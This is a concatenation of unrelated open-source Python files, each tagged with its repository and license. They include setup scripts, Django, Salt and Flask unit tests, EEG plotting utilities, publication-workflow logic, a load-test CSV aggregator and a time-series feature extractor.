url = 'http://repositorioacademico.upc.edu.pe/upc/oai/request'
| zamattiac/SHARE | providers/pe/upc/apps.py | Python | apache-2.0 | 394 |
#!/usr/bin/env python
# coding: utf-8
import os, re
from setuptools import setup, find_packages
PKG='txoauth'
VERSIONFILE = os.path.join('txoauth', '_version.py')
verstr = "unknown"
try:
verstrline = open(VERSIONFILE, "rt").read()
except EnvironmentError:
pass # Okay, there is no version file.
else:
MVSRE = r"^manual_verstr *= *['\"]([^'\"]*)['\"]"
mo = re.search(MVSRE, verstrline, re.M)
if mo:
mverstr = mo.group(1)
else:
print "unable to find version in %s" % (VERSIONFILE,)
        raise RuntimeError("if %s exists, it must be well-formed" % (VERSIONFILE,))
AVSRE = r"^auto_build_num *= *['\"]([^'\"]*)['\"]"
mo = re.search(AVSRE, verstrline, re.M)
if mo:
averstr = mo.group(1)
else:
averstr = ''
    verstr = '.'.join([mverstr, averstr]) if averstr else mverstr
trove_classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: BSD License",
"License :: DFSG approved",
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Natural Language :: English",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.5",
"Programming Language :: Python :: 2.6",
"Topic :: Utilities",
"Topic :: Software Development :: Libraries",
]
setup(
name="txoauth",
version=verstr,
description="provides OAuth 2.0 support for Twisted.",
author="Zooko Ofsimplegeo", # original author: Laurens Van Houtven
author_email="zooko@simplegeo.com",
url="https://github.com/simplegeo/txoauth",
packages = find_packages(),
test_suite="txoauth.test",
install_requires=["Twisted >= 9.0.0"],
setup_requires=['setuptools_trial'],
tests_require=['mock'],
license = "BSD",
classifiers=trove_classifiers,
zip_safe = False, # We prefer unzipped for easier access.
)
| simplegeo/txoauth-OLD | setup.py | Python | mit | 1,889 |
# -*- coding: utf-8 -*-
import json
from django.test import TestCase
from django.test.client import RequestFactory
from djangular.views.crud import NgCRUDView
from djangular.views.mixins import JSONResponseMixin
from server.models import DummyModel, DummyModel2, SimpleModel, M2MModel
class CRUDTestViewWithM2M(JSONResponseMixin, NgCRUDView):
"""
Include JSONResponseMixin to make sure there aren't any problems when using both together
"""
model = M2MModel
class CRUDTestViewWithFK(JSONResponseMixin, NgCRUDView):
"""
Include JSONResponseMixin to make sure there aren't any problems when using both together
"""
model = DummyModel
class CRUDTestView(JSONResponseMixin, NgCRUDView):
"""
Include JSONResponseMixin to make sure there aren't any problems when using both together
"""
model = DummyModel2
class CRUDTestViewWithSlug(NgCRUDView):
"""
Differs from CRUDTestViewWithFK in slug field 'email', which has a 'unique' constraint and
can be used as an alternative key (for GET operations only).
"""
model = SimpleModel
slug_field = 'email'
class CRUDViewTest(TestCase):
names = ['John', 'Anne', 'Chris', 'Beatrice', 'Matt']
emails = ["@".join((name, "example.com")) for name in names]
def setUp(self):
self.factory = RequestFactory()
# DummyModel2 and DummyModel / CRUDTestViewWithFK
model2 = DummyModel2(name="Model2 name")
model2.save()
for name in self.names:
DummyModel(name=name, model2=model2).save()
# SimpleModel / CRUDTestViewWithSlug
for name, email in zip(self.names, self.emails):
SimpleModel(name=name, email=email).save()
# model with m2m relationship
dummy_model2 = DummyModel2(name="Mathilde")
dummy_model2.save()
self.m2m_model = M2MModel()
self.m2m_model.save()
self.m2m_model.dummy_models.add(dummy_model2)
self.m2m_model.save()
def test_ng_query(self):
# CRUDTestViewWithFK
request = self.factory.get('/crud/')
response = CRUDTestViewWithFK.as_view()(request)
data = json.loads(response.content.decode('utf-8'))
for obj in data:
db_obj = DummyModel.objects.get(pk=obj['pk'])
self.assertEqual(obj['name'], db_obj.name)
# CRUDTestViewWithSlug
request2 = self.factory.get('/crud/')
response2 = CRUDTestViewWithSlug.as_view()(request2)
data2 = json.loads(response2.content.decode('utf-8'))
for obj in data2:
db_obj = SimpleModel.objects.get(email=obj['email'])
self.assertEqual(obj['name'], db_obj.name)
def test_ng_get(self):
# CRUDTestViewWithFK
request = self.factory.get('/crud/?pk=1')
response = CRUDTestViewWithFK.as_view()(request)
data = json.loads(response.content.decode('utf-8'))
self.assertEqual(self.names[0], data['name'])
# CRUDTestViewWithSlug
request2 = self.factory.get('/crud/?email={0}'.format(self.emails[0]))
response2 = CRUDTestViewWithSlug.as_view()(request2)
data2 = json.loads(response2.content.decode('utf-8'))
self.assertEqual(self.names[0], data2['name'])
def test_ng_save_create(self):
# CRUDTestViewWithFK
request = self.factory.post('/crud/',
data=json.dumps({'name': 'Leonard'}),
content_type='application/json')
response = CRUDTestView.as_view()(request)
data = json.loads(response.content.decode('utf-8'))
pk = data['pk']
request2 = self.factory.get('/crud/?pk={0}'.format(pk))
response2 = CRUDTestView.as_view()(request2)
data2 = json.loads(response2.content.decode('utf-8'))
self.assertEqual(data2['name'], 'Leonard')
# CRUDTestViewWithSlug
request3 = self.factory.post('/crud/',
data=json.dumps({'name': 'Leonard', 'email': 'Leonard@example.com'}),
content_type='application/json')
CRUDTestViewWithSlug.as_view()(request3)
request4 = self.factory.get('/crud/?email={0}'.format('Leonard@example.com'))
response4 = CRUDTestViewWithSlug.as_view()(request4)
data4 = json.loads(response4.content.decode('utf-8'))
self.assertEqual(data4['name'], 'Leonard')
request5 = self.factory.post('/crud/',
data=json.dumps({'name': 'Leonard2', 'email': 'Leonard@example.com'}),
content_type='application/json')
response5 = CRUDTestViewWithSlug.as_view()(request5)
self.assertGreaterEqual(response5.status_code, 400)
data5 = json.loads(response5.content.decode('utf-8'))
self.assertTrue('detail' in data5 and 'email' in data5['detail'] and len(data5['detail']['email']) > 0)
def test_ng_save_update(self):
# CRUDTestViewWithFK
request = self.factory.post('/crud/?pk=1',
data=json.dumps({'pk': 1, 'name': 'John2'}),
content_type='application/json')
response = CRUDTestView.as_view()(request)
data = json.loads(response.content.decode('utf-8'))
self.assertEqual(data['name'], 'John2')
request2 = self.factory.get('/crud/?pk=1')
response2 = CRUDTestView.as_view()(request2)
data2 = json.loads(response2.content.decode('utf-8'))
self.assertEqual(data2['name'], 'John2')
# CRUDTestViewWithSlug
request3 = self.factory.post('/crud/?pk=1',
data=json.dumps({'name': 'John', 'email': 'John2@example.com'}),
content_type='application/json')
response3 = CRUDTestViewWithSlug.as_view()(request3)
data3 = json.loads(response3.content.decode('utf-8'))
self.assertEqual(data3['name'], 'John')
self.assertEqual(data3['email'], 'John2@example.com')
request4 = self.factory.get('/crud/?email=John2@example.com')
response4 = CRUDTestViewWithSlug.as_view()(request4)
data4 = json.loads(response4.content.decode('utf-8'))
self.assertEqual(data4['name'], 'John')
request5 = self.factory.post('/crud/?pk=3', # Modifying "Chris"
data=json.dumps({'pk': 4, 'name': 'John2', 'email': 'John2@example.com'}),
content_type='application/json')
response5 = CRUDTestViewWithSlug.as_view()(request5)
self.assertGreaterEqual(response5.status_code, 400)
data5 = json.loads(response5.content.decode('utf-8'))
self.assertTrue('detail' in data5 and 'email' in data5['detail'] and len(data5['detail']['email']) > 0)
def test_ng_delete(self):
# CRUDTestViewWithFK
request = self.factory.delete('/crud/?pk=1')
response = CRUDTestViewWithFK.as_view()(request)
data = json.loads(response.content.decode('utf-8'))
deleted_name = data['name']
request2 = self.factory.get('/crud/')
response2 = CRUDTestViewWithFK.as_view()(request2)
data2 = json.loads(response2.content.decode('utf-8'))
for obj in data2:
self.assertTrue(deleted_name != obj['name'])
# CRUDTestViewWithSlug delete is not different from CRUDTestViewWithFK only testing error status codes
request3 = self.factory.delete('/crud/?email=Anne@example.com') # Missing pk
response3 = CRUDTestViewWithSlug.as_view()(request3)
self.assertEqual(response3.status_code, 400)
request4 = self.factory.delete('/crud/?pk=100') # Invalid pk
response4 = CRUDTestViewWithSlug.as_view()(request4)
self.assertEqual(response4.status_code, 404)
# Testing with m2m relationship
request5 = self.factory.delete('/crud/?pk=%s' % self.m2m_model.pk)
response5 = CRUDTestViewWithM2M.as_view()(request5)
self.assertEqual(response5.status_code, 200)
| vaniakov/django-angular | examples/server/tests/test_crud.py | Python | mit | 8,124 |
""" Testing ``isestimable`` in regression module
"""
from __future__ import absolute_import
import numpy as np
from ..regression import isestimable
from numpy.testing import (assert_almost_equal,
assert_array_equal)
from nose.tools import (assert_true, assert_false, assert_raises,
assert_equal, assert_not_equal)
def test_estimable():
rng = np.random.RandomState(20120713)
N, P = (40, 10)
X = rng.normal(size=(N, P))
C = rng.normal(size=(1, P))
assert_true(isestimable(C, X))
assert_true(isestimable(np.eye(P), X))
for row in np.eye(P):
assert_true(isestimable(row, X))
X = np.ones((40, 2))
assert_true(isestimable([1, 1], X))
assert_false(isestimable([1, 0], X))
assert_false(isestimable([0, 1], X))
assert_false(isestimable(np.eye(2), X))
halfX = rng.normal(size=(N, 5))
X = np.hstack([halfX, halfX])
assert_false(isestimable(np.hstack([np.eye(5), np.zeros((5, 5))]), X))
assert_false(isestimable(np.hstack([np.zeros((5, 5)), np.eye(5)]), X))
assert_true(isestimable(np.hstack([np.eye(5), np.eye(5)]), X))
# Test array-like for design
XL = X.tolist()
assert_true(isestimable(np.hstack([np.eye(5), np.eye(5)]), XL))
# Test ValueError for incorrect number of columns
X = rng.normal(size=(N, 5))
for n in range(1, 4):
assert_raises(ValueError, isestimable, np.ones((n,)), X)
assert_raises(ValueError, isestimable, np.eye(4), X)
| alexis-roche/nipy | nipy/algorithms/statistics/models/tests/test_estimable.py | Python | bsd-3-clause | 1,497 |
#!/usr/bin/env python3
from flask import *
from meteorismo import app
| iomataani/meteorismo | main.py | Python | gpl-2.0 | 70 |
"""
:codeauthor: Jayesh Kariya <jayeshk@saltstack.com>
"""
import copy
import os
import pytest
import salt.modules.scsi as scsi
import salt.utils.path
from tests.support.mock import MagicMock, patch
@pytest.fixture
def configure_loader_modules():
return {scsi: {}}
def test_ls_():
"""
Test for list SCSI devices, with details
"""
lsscsi = {
"stdout": "[0:0:0:0] disk HP LOGICAL VOLUME 6.68 /dev/sda [8:0]",
"stderr": "",
"retcode": 0,
}
lsscsi_size = {
"stdout": "[0:0:0:0] disk HP LOGICAL VOLUME 6.68 /dev/sda [8:0] 1.20TB",
"stderr": "",
"retcode": 0,
}
result = {
"[0:0:0:0]": {
"major": "8",
"lun": "0:0:0:0",
"device": "/dev/sda",
"model": "LOGICAL VOLUME 6.68",
"minor": "0",
"size": None,
}
}
result_size = copy.deepcopy(result)
result_size["[0:0:0:0]"]["size"] = "1.20TB"
mock = MagicMock(return_value="/usr/bin/lsscsi")
with patch.object(salt.utils.path, "which", mock):
# get_size = True
cmd_mock = MagicMock(return_value=lsscsi_size)
with patch.dict(scsi.__salt__, {"cmd.run_all": cmd_mock}):
assert scsi.ls_() == result_size
with patch.dict(lsscsi_size, {"retcode": 1, "stderr": "An error occurred"}):
assert scsi.ls_() == "An error occurred"
with patch.dict(
lsscsi_size,
{"retcode": 1, "stderr": "lsscsi: invalid option -- 's'\nUsage:"},
):
assert (
scsi.ls_() == "lsscsi: invalid option -- 's' - try get_size=False"
)
# get_size = False
cmd_mock = MagicMock(return_value=lsscsi)
with patch.dict(scsi.__salt__, {"cmd.run_all": cmd_mock}):
assert scsi.ls_(get_size=False) == result
mock = MagicMock(return_value=None)
with patch.object(salt.utils.path, "which", mock):
assert scsi.ls_() == "scsi.ls not available - lsscsi command not found"
def test_rescan_all():
"""
Test for list scsi devices
"""
mock = MagicMock(side_effect=[False, True])
with patch.object(os.path, "isdir", mock):
assert scsi.rescan_all("host") == "Host host does not exist"
with patch.dict(scsi.__salt__, {"cmd.run": MagicMock(return_value="A")}):
assert scsi.rescan_all("host") == ["A"]
| saltstack/salt | tests/pytests/unit/modules/test_scsi.py | Python | apache-2.0 | 2,457 |
"""
Utilities for plotting various figures and animations in EEG101.
"""
# Author: Hubert Banville <hubert@neurotechx.com>
#
# License: TBD
import numpy as np
import matplotlib.pyplot as plt
import collections
from scipy import signal
def dot_plot(x, labels, step=1, figsize=(12,8)):
"""
Make a 1D dot plot.
Inputs
x : 1D array containing the points to plot
labels : 1D array containing the label for each point in x
step : vertical space between two points
"""
# Get the histogram for each class
classes = np.unique(labels)
hist = [np.histogram(x[labels==c], density=True) for c in classes]
# Prepare the figure
fig, ax = plt.subplots(figsize=figsize)
for hi, h in enumerate(hist):
bin_centers = (h[1][1:] + h[1][0:-1])/2. # Get bin centers
# Format the data so that each bin has as many points as the histogram bar for that bin
x1 = []
y1 = []
for i, j in zip(np.round(h[0]).astype(int), bin_centers):
y = range(0, i, step)
y1 += y
x1 += [j]*len(y)
# Plot
ax.plot(x1, (-1)**hi*np.array(y1), 'o', markersize=10, label=classes[hi])
ax.legend(scatterpoints=1)
ax.set_xlabel('Alpha power')
ax.set_ylabel('Number of points')
ax.set_yticklabels([])
ax.set_yticks([])
ax.legend()
plt.tight_layout()
def psd_with_bands_plot(f, psd, figsize=(12,8)):
"""
Plot a static PSD.
INPUTS
f : 1D array containing frequencies of the PSD
psd : 1D array containing the power at each frequency in f
figsize : figure size
"""
bands = collections.OrderedDict()
bands[r'$\delta$'] = (0,4)
bands[r'$\theta$'] = (4,8)
bands[r'$\alpha$'] = (8,13)
bands[r'$\beta$'] = (13, 30)
bands[r'$\gamma$'] = (30, 120)
fig, ax = plt.subplots(figsize=figsize)
ax.plot(f, psd)
ax.set_xlabel('Frequency (Hz)')
ax.set_ylabel('Power (dB)')
ylim = ax.get_ylim()
    for i, [bkey, bfreq] in enumerate(bands.items()):
ind = (f>=bfreq[0]) & (f<=bfreq[1])
f1 = f[ind]
y1 = psd[ind]
ax.fill_between(f1, y1, ylim[0], facecolor=[(0.7, i/5., 0.7)], alpha=0.5)
ax.text(np.mean(f1), (ylim[0] + ylim[1])/1.22, bkey, fontsize=16, verticalalignment='top', horizontalalignment='center')
ax.set_xlim([min(f), max(f)])
def sinewave(A, f, phi, t):
"""
Return a sine wave with specified parameters at the given time points.
INPUTS
A : Amplitude
f : Frequency (Hz)
phi : Phase (rad)
t : time (in s)
"""
return A*np.sin(2*np.pi*f*t + phi)
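# Example usage (illustrative values): one second of a 10 Hz, unit-amplitude
# sine sampled at 256 Hz, i.e. ten full cycles:
#   t = np.arange(256) / 256.0
#   x = sinewave(A=1, f=10, phi=0, t=t)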
def animate_signals(nb_signals, incre, fs=256, refresh_rate=30., anim_dur=10., figsize=(12,8)):
"""
Draw and update a figure in real-time representing the summation of many
sine waves, to explain the concept of Fourier decomposition.
INPUTS
nb_signals : number of signals to sum together
incre : increment, in Hz, between each of the signals
fs : sampling frequency
refresh_rate : refresh rate of the animation
anim_dur : approximate duration of the animation, in seconds
"""
# Initialize values that remain constant throughout the animation
A = 1
t = np.linspace(0, 2, fs)
offsets = np.arange(nb_signals+1).reshape((nb_signals+1,1))*(A*(nb_signals+1))
freqs = np.arange(nb_signals)*incre
# Initialize the figure
fig, ax = plt.subplots(figsize=figsize)
ax.hold(True)
plt.xlabel('Time')
ax.yaxis.set_ticks(offsets)
ax.set_yticklabels([str(f)+' Hz' for f in freqs] + ['Sum'])
ax.xaxis.set_ticks([])
# Initialize the Line2D elements for each signal
sines = np.array([sinewave(A, f, 0, t) for f in freqs])
sines = np.vstack((sines, np.sum(sines, axis=0))) + offsets
points = [ax.plot(t, x)[0] for x in sines]
# Animation refresh loop
for i in np.arange(anim_dur*refresh_rate):
# Update time
t = np.linspace(0, 2, fs) + i*fs/refresh_rate
# Update signals
sines = np.array([sinewave(A, f, 0, t) for f in freqs])
sines = np.vstack((sines, np.sum(sines, axis=0))) + offsets
# Update figure
for p, x in zip(points, sines):
p.set_ydata(x)
# Wait before starting another cycle
plt.pause(1./refresh_rate)
if __name__ == '__main__':
# 1) DISTRIBUTION OF TRAINING DATA
# Generate fake data
nb_points = 10*10
relax_data = np.random.normal(0.01, 0.01, size=(nb_points,))
focus_data = np.random.normal(0.03, 0.01, size=(nb_points,))
dot_plot(x=np.concatenate((relax_data, focus_data)),
labels=np.concatenate((np.zeros((nb_points,)), np.ones((nb_points,)))),
step=4)
# 2) PSD PLOT
# Generate fake data
    f = np.arange(1, 110, 1) # one-second windows = 1-Hz bins (start at 1 Hz to avoid dividing by zero)
    psd = 10*np.log10(1./f)
psd_with_bands_plot(f, psd)
# 3) FOURIER DECOMPOSITION ANIMATION
    animate_signals(4, 2)
| NeuroTechX/eeg-101 | python_tools/utilities.py | Python | isc | 5,241 |
# -*- coding: utf-8 -*-
"""
tests.test_functionality
{{ "~" * "tests.test_functionality"|count }}
Test basic login and registration functionality
:author: {{ cookiecutter.author }}
:copyright: © {{ cookiecutter.copyright }}
:license: {{ cookiecutter.license }}, see LICENSE for more details.
templated from https://github.com/ryanolson/cookiecutter-webapp
"""
import pytest
from flask import url_for
from flask.ext.security.utils import verify_password
from {{cookiecutter.app_name}}.models.users import User
from .factories import UserFactory
@pytest.fixture
def user(db):
return UserFactory(password='myprecious')
class TestLoggingIn:
def test_jwt_log_in_returns_200_with_token(self, user, testapp):
data = dict(username=user.email, password='myprecious')
res = testapp.post_json('/auth', data)
assert res.status_code == 200
assert 'token' in res.json
def test_log_in_returns_200_with_email_on_page(self, user, testapp):
# Goes to homepage
res = testapp.get("/")
# Clicks Login link
res = res.click("Login")
# Fills out login form
form = res.forms['login_form']
form['email'] = user.email
form['password'] = 'myprecious'
# Submits
res = form.submit().follow()
assert res.status_code == 200
assert user.email in res
def test_sees_login_link_on_log_out(self, user, testapp):
res = testapp.get("/login")
# Fills out login form on the login page
form = res.forms['login_form']
form['email'] = user.email
form['password'] = 'myprecious'
# Submits
res = form.submit().follow()
res = testapp.get(url_for('security.logout')).follow()
# sees login link
assert url_for('security.login') in res
def test_sees_error_message_if_password_is_incorrect(self, user, testapp):
# Goes to homepage
res = testapp.get("/login")
# Fills out login form, password incorrect
form = res.forms['login_form']
form['email'] = user.email
form['password'] = 'wrong'
# Submits
res = form.submit()
# sees error
assert "Invalid password" in res
def test_sees_error_message_if_username_doesnt_exist(self, user, testapp):
# Goes to homepage
res = testapp.get("/login")
# Fills out login form with an unknown email
form = res.forms['login_form']
form['email'] = 'unknown'
form['password'] = 'myprecious'
# Submits
res = form.submit()
# sees error
assert "user does not exist" in res
def test_auth_jwt_token_succeeds_with_logged_in_user_and_json_post(self, user, testapp):
self.test_log_in_returns_200_with_email_on_page(user, testapp)
resp = testapp.post_json("/auth/jwt/token", {})
assert resp.status_code == 200
assert 'token' in resp.json
def test_auth_jwt_token_fails_with_logged_in_user_and_non_json_post(self, user, testapp):
self.test_log_in_returns_200_with_email_on_page(user, testapp)
resp = testapp.post("/auth/jwt/token", {}, expect_errors=True)
assert resp.status_code == 415
def test_auth_jwt_token_fails_without_logged_in_user(self, user, testapp):
resp = testapp.post_json("/auth/jwt/token", {}, expect_errors=True)
assert resp.status_code == 401
class TestRegistering:
def test_can_register(self, user, testapp):
old_count = len(User.all())
# Goes to homepage
res = testapp.get("/")
# Clicks Create Account button
res = res.click("Login")
res = res.click("register")
# Fills out the form
form = res.forms["register_form"]
form['email'] = 'foo@bar.com'
form['password'] = 'secret'
form['password_confirm'] = 'secret'
# Submits
res = form.submit().follow()
assert res.status_code == 200
# A new user was created
assert len(User.all()) == old_count + 1
def test_sees_error_message_if_the_password_is_too_short(self, user, testapp):
# Goes to registration page
res = testapp.get(url_for("security.register"))
# Fills out registration form, but password is too short
form = res.forms["register_form"]
form['email'] = 'foo@bar.com'
form['password'] = 'short'
form['password_confirm'] = 'short'
# Submits
res = form.submit()
# sees error
assert "Password must be at least 6 characters" in res
def test_sees_error_message_if_passwords_dont_match(self, user, testapp):
# Goes to registration page
res = testapp.get(url_for("security.register"))
# Fills out form, but passwords don't match
form = res.forms["register_form"]
        form['email'] = 'foo@bar.com'
form['password'] = 'secret'
form['password_confirm'] = 'secrets'
# Submits
res = form.submit()
# sees error message
assert "Passwords do not match" in res
def test_sees_error_message_if_user_already_registered(self, user, testapp):
user = UserFactory(active=True) # A registered user
user.save()
# Goes to registration page
res = testapp.get(url_for("security.register"))
# Fills out form, but username is already registered
form = res.forms["register_form"]
form['email'] = user.email
form['password'] = 'secret'
form['password_confirm'] = 'secret'
# Submits
res = form.submit()
# sees error
assert "is already associated with an account" in res
| ryanolson/cookiecutter-webapp | {{cookiecutter.app_name}}/tests/test_functionality.py | Python | mit | 5,755 |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License
#
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
import unittest
from qpid_dispatch.management.entity import EntityBase, camelcase
class EntityTest(unittest.TestCase):
def test_camelcase(self):
self.assertEqual('', camelcase(''))
self.assertEqual('foo', camelcase('foo'))
self.assertEqual('Foo', camelcase('foo', capital=True))
self.assertEqual('fooBar', camelcase('foo bar'))
self.assertEqual('fooBar', camelcase('foo.bar'))
self.assertEqual('fooBar', camelcase('foo-bar'))
self.assertEqual('fooBar', camelcase('foo_bar'))
self.assertEqual('fooBarBaz', camelcase('foo_bar.baz'))
self.assertEqual('FooBarBaz', camelcase('foo_bar.baz', capital=True))
self.assertEqual('fooBar', camelcase('fooBar'))
self.assertEqual('FooBar', camelcase('fooBar', capital=True))
def test_entity(self):
e = EntityBase({'fooBar': 'baz'}, type='container', name='x')
self.assertEqual(e.attributes, {'type': 'container', 'name': 'x', 'fooBar': 'baz'})
self.assertEqual(e.name, 'x')
self.assertEqual(e['name'], 'x')
e.name = 'y'
self.assertEqual(e.name, 'y')
self.assertEqual(e['name'], 'y')
self.assertEqual(e.attributes['name'], 'y')
e.xx = 'xx'
self.assertEqual(e.xx, 'xx')
self.assertEqual(e['xx'], 'xx')
self.assertEqual(e.attributes['xx'], 'xx')
if __name__ == '__main__':
unittest.main()
| ganeshmurthy/qpid-dispatch | tests/management/entity.py | Python | apache-2.0 | 2,365 |
# -*- coding: utf-8 -*-
#
# This file is part of EUDAT B2Share.
# Copyright (C) 2015, 2016, University of Tuebingen, CERN.
#
# B2Share is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# B2Share is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with B2Share; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Publication workflows."""
from .errors import InvalidPublicationStateError
def review_and_publish_workflow(previous_model, new_deposit):
"""Workflow publishing the deposits on submission."""
from b2share.modules.deposit.api import PublicationStates
new_state = new_deposit['publication_state']
previous_state = previous_model.json['publication_state']
if previous_state != new_state:
transition = (previous_state, new_state)
# Check that the transition is a valid one
if transition not in [
(PublicationStates.draft.name, PublicationStates.submitted.name),
(PublicationStates.submitted.name, PublicationStates.draft.name),
(PublicationStates.submitted.name,
PublicationStates.published.name),
]:
raise InvalidPublicationStateError(
                description='Transition from publication state {0} to {1} is '
'not allowed by community\'s workflow {2}'.format(
previous_state, new_state, 'review_and_publish'
)
)
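# The three tuples above define the review_and_publish state machine:
#   draft -> submitted -> published
#   submitted -> draft (the submission can be sent back for further edits)
# Any other transition raises InvalidPublicationStateError.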
def direct_publish_workflow(previous_model, new_deposit):
"""Workflow publishing the deposits on submission."""
from b2share.modules.deposit.api import PublicationStates
new_state = new_deposit['publication_state']
previous_state = previous_model.json['publication_state']
if previous_state != new_state:
transition = (previous_state, new_state)
# Check that the transition is a valid one
if transition not in [
(PublicationStates.draft.name, PublicationStates.submitted.name),
(PublicationStates.draft.name, PublicationStates.published.name),
]:
raise InvalidPublicationStateError(
description='Transition from publication state {0} to {1} is '
'not allowed by community\'s workflow {2}'.format(
previous_state, new_state, 'direct_publish'
)
)
# Publish automatically when submitted
if new_state == PublicationStates.submitted.name:
new_deposit['publication_state'] = PublicationStates.published.name
publication_workflows = {
'review_and_publish': review_and_publish_workflow,
'direct_publish': direct_publish_workflow,
}
| SarahBA/b2share | b2share/modules/communities/workflows.py | Python | gpl-2.0 | 3,365 |
'''
Created on Jan 8, 2015
@author: ubuntu
'''
putCablingPlan = []
putDeviceConfiguration = []
getDevices = []
getIpFabric = []
def main():
outFile = open("out.csv","w") # open file for appending
with open ("locust.csv", "r") as locust:
for line in locust:
if 'cabling-plan' in line:
putCablingPlan.append(line)
elif 'device-configuration' in line:
putDeviceConfiguration.append(line)
elif 'devices' in line:
getDevices.append(line)
elif 'GET' in line and 'ip-fabrics/' in line and 'devices' not in line:
getIpFabric.append(line)
elif 'None' in line and 'Total' in line:
lastLine = line
else:
outFile.write(line)
outFile.write(aggregate(putCablingPlan))
outFile.write(aggregate(putDeviceConfiguration))
outFile.write(aggregate(getDevices))
outFile.write(aggregate(getIpFabric))
outFile.write('\n')
outFile.write(lastLine)
outFile.close()
def aggregate(requests):
#"Method","Name","# requests","# failures","Median response time","Average response time","Min response time","Max response time","Average Content Size","Requests/s"
#"PUT","/openclos/ip-fabrics/000a63e2-2f3c-4c62-a09c-989902c35022/cabling-plan",4,0,520,563,503,687,0,0.03
noOfRequest = 0
failure = 0
median = 0
average = 0
mins = []
maxs = []
contentSize = 0
reqPerSec = 0.0
params = []
for request in requests:
params = request.split(',')
noOfRequest += int(params[2])
failure += int(params[3])
median += int(params[4])
average += int(params[5])
mins.append(int(params[6]))
maxs.append(int(params[7]))
contentSize += int(params[8])
reqPerSec += float(params[9])
rowCount = len(requests)
nameSplit = params[1].split('/')
nameSplit[3] = '<fabric id>'
if len(nameSplit) == 4:
nameSplit[3] += '"'
out = [params[0], '/'.join(nameSplit), str(noOfRequest), str(failure), str(int(median/rowCount)), str(int(average/rowCount)),
str(min(mins)), str(max(maxs)), str(int(contentSize)), str(round(reqPerSec/rowCount, 2))+'\n']
return ','.join(out)
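# Illustrative example (made-up numbers): two PUT rows that differ only in the
# fabric id collapse into a single row keyed on '<fabric id>', with counts
# summed, median/average times averaged, min/max taken across rows, and
# requests-per-second averaged:
#   aggregate(['"PUT","/openclos/ip-fabrics/AAA/cabling-plan",4,0,520,563,503,687,0,0.03\n',
#              '"PUT","/openclos/ip-fabrics/BBB/cabling-plan",2,0,480,500,450,700,0,0.01\n'])
#   -> '"PUT","/openclos/ip-fabrics/<fabric id>/cabling-plan",6,0,500,531,450,700,0,0.02\n'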
if __name__ == '__main__':
main()
| plucena24/OpenClos | jnpr/openclos/tests/performance/postProcess.py | Python | apache-2.0 | 2,361 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import os.path
import configparser
import pandas as pd
from tqdm import tqdm
from tsfresh.utilities.dataframe_functions import impute
from tsfresh.feature_extraction import feature_calculators
def main():
if len(sys.argv) < 2:
print('Usage: ./extract_best_features.py datafile.csv')
exit(1)
load_params()
if not os.path.isfile('timeseries.csv') or not os.path.isfile('labels.csv'):
filename = sys.argv[1]
raw_price_data = pd.read_csv(filename, index_col=None, header=0, thousands=',')
timeseries, labels = convert(raw_price_data)
timeseries.to_csv('timeseries.csv', index=False, header=True)
labels.reset_index(drop=True, inplace=True)
labels.to_csv('labels.csv', sep=',', index=False, header=False)
else:
print('Intermediate files exist...')
timeseries = pd.read_csv('timeseries.csv', index_col=None, header=0)
# timeseries = pd.read_csv('short_timeseries.csv', index_col=None, header=0)
features = extract_best_features(timeseries, samples_per_window=LOOKBACK_MINUTES)
impute(features)
features.reset_index(drop=True, inplace=True)
features.to_csv('features_extracted.csv', sep=',', index=False, header=True)
def extract_best_features(timeseries, samples_per_window):
    '''
    Extract the eight FFT-coefficient features selected earlier by recursive
    feature elimination (RFE); the corresponding tsfresh feature names are
    listed in the comment after this function.
    '''
extracted_features = pd.DataFrame()
start = 0
end = samples_per_window
col_feature1 = []
col_feature2 = []
col_feature3 = []
col_feature4 = []
col_feature5 = []
col_feature6 = []
col_feature7 = []
col_feature8 = []
for i in tqdm(range(len(timeseries) // samples_per_window)):
window = timeseries[start:end]['Open'].as_matrix().tolist()
col_feature1.append(list(feature_calculators.fft_coefficient(window, [{'coeff': 10, 'attr': 'imag'}]))[0][1])
col_feature2.append(list(feature_calculators.fft_coefficient(window, [{'coeff': 14, 'attr': 'imag'}]))[0][1])
col_feature3.append(list(feature_calculators.fft_coefficient(window, [{'coeff': 2, 'attr': 'abs'}]))[0][1])
col_feature4.append(list(feature_calculators.fft_coefficient(window, [{'coeff': 3, 'attr': 'real'}]))[0][1])
col_feature5.append(list(feature_calculators.fft_coefficient(window, [{'coeff': 4, 'attr': 'real'}]))[0][1])
col_feature6.append(list(feature_calculators.fft_coefficient(window, [{'coeff': 6, 'attr': 'imag'}]))[0][1])
col_feature7.append(list(feature_calculators.fft_coefficient(window, [{'coeff': 7, 'attr': 'imag'}]))[0][1])
col_feature8.append(list(feature_calculators.fft_coefficient(window, [{'coeff': 8, 'attr': 'real'}]))[0][1])
start = end
end += samples_per_window
extracted_features['Open_feature1'] = col_feature1
extracted_features['Open_feature2'] = col_feature2
extracted_features['Open_feature3'] = col_feature3
extracted_features['Open_feature4'] = col_feature4
extracted_features['Open_feature5'] = col_feature5
extracted_features['Open_feature6'] = col_feature6
extracted_features['Open_feature7'] = col_feature7
extracted_features['Open_feature8'] = col_feature8
return extracted_features
